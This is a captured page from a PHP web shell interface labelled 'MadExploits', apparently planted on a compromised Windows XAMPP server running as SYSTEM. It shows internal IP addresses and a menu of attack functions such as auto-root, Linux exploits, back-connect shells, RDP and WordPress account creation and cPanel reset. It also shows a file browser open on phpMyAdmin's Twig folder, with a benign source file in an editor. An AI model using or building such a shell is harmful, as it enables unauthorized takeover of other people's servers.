Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
libraries /
classes /
Twig /
[ HOME SHELL ]
Name
Size
Permission
Action
I18n
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
CoreExtension.php
833
B
-rw-rw-rw-
I18nExtension.php
931
B
-rw-rw-rw-
MessageExtension.php
1.27
KB
-rw-rw-rw-
PluginsExtension.php
1.21
KB
-rw-rw-rw-
RelationExtension.php
1.63
KB
-rw-rw-rw-
SanitizeExtension.php
1.41
KB
-rw-rw-rw-
ServerPrivilegesExtension.php
1.16
KB
-rw-rw-rw-
StorageEngineExtension.php
757
B
-rw-rw-rw-
TableExtension.php
668
B
-rw-rw-rw-
TrackerExtension.php
693
B
-rw-rw-rw-
TransformationsExtension.php
1.01
KB
-rw-rw-rw-
UrlExtension.php
1.19
KB
-rw-rw-rw-
UtilExtension.php
6.4
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MessageExtension.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * hold PhpMyAdmin\Twig\MessageExtension class * * @package PhpMyAdmin\Twig */ declare(strict_types=1); namespace PhpMyAdmin\Twig; use PhpMyAdmin\Message; use Twig\Extension\AbstractExtension; use Twig\TwigFilter; /** * Class MessageExtension * * @package PhpMyAdmin\Twig */ class MessageExtension extends AbstractExtension { /** * Returns a list of filters to add to the existing list. * * @return TwigFilter[] */ public function getFilters() { return [ new TwigFilter( 'notice', function (string $string) { return Message::notice($string)->getDisplay(); }, ['is_safe' => ['html']] ), new TwigFilter( 'error', function (string $string) { return Message::error($string)->getDisplay(); }, ['is_safe' => ['html']] ), new TwigFilter( 'raw_success', function (string $string) { return Message::rawSuccess($string)->getDisplay(); }, ['is_safe' => ['html']] ), ]; } }
Close